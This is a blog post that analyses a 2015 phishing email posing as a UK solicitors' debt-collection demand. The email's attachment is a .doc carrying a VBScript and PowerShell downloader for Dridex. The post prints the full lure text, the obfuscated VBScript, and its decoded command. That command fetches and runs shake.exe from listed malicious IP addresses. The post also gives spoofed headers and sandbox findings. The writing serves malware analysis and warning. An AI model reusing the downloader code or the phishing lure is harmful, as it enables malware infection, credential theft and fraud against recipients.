Submit to DiggSubmit to FacebookSubmit to Google PlusSubmit to StumbleuponSubmit to Twitter

Email:

Fake Aspiring Solicitors virus spam email claims you are required to pay some balance to avoid court proceedings.

Attached XML .doc contains a .xls object that downloads malware.

Or rather, it LOOKS like it contans an .xls object. It's actually a VBScript that calls powershell to download malware.


Subject: Aspiring Solicitors Debt Collection  

 Aspiring Solicitors

Ref : 178357674
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:07720784
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees GBP 245.00

Solicitors Costs GBP 750.00

Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Christy Monroe
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom

178357674.doc (20)

Header Examples:

19 March 2015

Spoofs or just uses random junk in the From and Envelope (MAIL FROM) headers but consistent per email.

I received 15 of these emails from 14 IP addresses in 6 countries.

Received: from dslb-188-107-206-128.188.107.pools.vodafone-ip.de [188.107.206.128]
X-Envelope-From: Marilyn.ee83 @dok.ro
Subject: Aspiring Solicitors Debt Collection
From: Frederic Pope <Marilyn.ee83 @dok.ro>

Received: from 125-227-231-1.HINET-IP.hinet.net [125.227.231.1]
X-Envelope-From: Joyce.d85 @georgeyardley.com
Subject: Aspiring Solicitors Debt Collection
From: Christy Monroe <Joyce.d85 @georgeyardley.com>

Received: from localhost [113.179.59.115]
X-Envelope-From: Mandy.314 @ehess.fr
From: Luisa Conrad <Mandy.314 @ehess.fr>
Subject: Aspiring Solicitors Debt Collection

Received: from 37-157-188-34.net1.bg [37.157.188.34]
X-Envelope-From: Boris.c832 @net1.bg
From: Cindy Barrett <Boris.c832 @net1.bg>
Subject: Aspiring Solicitors Debt Collection

Malware

19 March 2015

Attachment : malicious XML-formatted .doc file with embedded .xls object that downloads malware : 178357674.doc

VirusTotal report 

ESET-NOD32 	VBA/TrojanDownloader.Agent.KP
Sophos Troj/DocDl-IR

You can download a copy of this .doc file at this Malwr.com report

This .doc file has an embedded .xls object that does the actual work:

Picture of .doc with embedded xls file.

The GOOD news is that MS Office at least seems to warn you when you try to "activate" this object by double-clicking with a warning like You are about to activate an embedded object that may containg viruses....

...Well, it sounds like not EVERYONE gets a warning. So never-mind on that good news.

Picture of tweet that some Office products dont make warnings.

The XML file has two big chunks of base64 data in it. The first one:

<w:binData w:name="oledata.mso">
0M8R4KGxGuEAAAAAAAAAA ....
....BoAHQAdABwADkAMQAuADIAMgA2AC4AOQAzAC4ANQAxAA==
</w:binData></w:docOleData>

.... Which seems to be where all the magic really is.  I did find these strings in the binary after un-base64ing  (without the [ ] brackets ) :

Root Entry
_1488187535
file:///Y:\[g]@jabber.ru\18.03.15\http91.226.93.51

Actually, screw it: The object is actually this .VBS script, shown below.

There are at least two ways to get this script out: Run the thing and go get the VBS out of the temp folder (what I did), or how Christopher Lowson (lowson.ca / twitter.com/LowsonWebmin) explained it to me by un-base64'ing to a binary file, trimming some front fat off the binary, adding a gzip file header (but, only 8 bytes of it, *shrug*), then un-gzipping it.

VBScript is a Microsoft scripting language based on Visual Basic, like VBA is, but a little different.

GVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzE3Ni4zMS4yOC4yNDQvc21vb3p5L3NoYWtlLmV4ZScsJyVURU1QJVxKSU9pb2RmaGlvSUguY2FiJyk7IGV4cGFuZCAlVEVNUCVcSklPaW9kZmhpb0lILmNhYiAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTsgc3RhcnQgJVRFTVAlXEpJT2lvZGZoaW9JSC5leGU7")

CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &""),0
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then Err.Raise 1, "Base64Decode", "Bad Base64 string." Exit Function End If
For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0
For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Err.Raise 2, "Base64Decode", "Bad character In Base64 string." Exit Function End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes)
Next Base64Decode = sOut End Function

Which breaks down to :

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile 
(New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe',
'%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;
start %TEMP%\JIOiodfhioIH.exe;

The second chunk of base64 is like :

<w:binData w:name="wordml://06000001.emz">
H4sIAAAAAAACC82YT2hcRRzHf9m+JApao1RUCLjGKDmkIUiE1apJag....
....eo5hzsm+LLP8DTnuK37gVAAA=
</w:binData>

...which just seems to be the icon of the .xls embedded object. In fact, if you un-base64 it you get a file like :

gzip compressed data, from NTFS filesystem (NT), max compression

And after un gzipping:

Windows Enhanced Metafile (EMF) image data version 0x10000

Which, when viewed with a hex editor, you can see the information and attributes that tie back to the icon in the .doc file:

Picture of EMF file gunzipped from binary file from second base64 in malicious doc file.

Long story short, this .doc would like to download an executable form places like:

176.31.28.244/smoozy/shake.exe
193.26.217.199/smoozy/shake.exe

Matt Mesa noticed that the string :

file:///Y:\g[@]jabber.ru\18.03.15\http91.226.93.51

has an ip address with a very interesting connection :

Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset.

8/62 2015-03-19 15:41:49 http://91.226.93.51/smoozy/shake.exe <--- srsly?
2/62 2015-03-19 15:07:49 http://91.226.93.51/
1/62 2015-03-18 14:54:05 http://91.226.93.51/smoozy

Say WHAT?

Downloaded executable : shake.exe ( dridex )

VirusTotal report 

Kaspersky 	UDS:DangerousObject.Multi.Generic 

metadata:
Original name twext.dll
Internal name twext
File version 6.00.3800.5512 (xpsp.080413-2105)

Malwr.com report 

Performs some HTTP requests
Unconventionial binary language: Russian
The binary likely contains encrypted or compressed data.
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Installs itself for autorun at Windows startup

HTTP POST: 95.163.121.33
BS domain : YpSdJfvYWxem net
BS referer : https://yahoo.com/

Hybrid-Anaylsis.net report

Also:

Found in memory : botnet="120"

 If this was at least a little helpful, how about a +1, Like, or Tweet?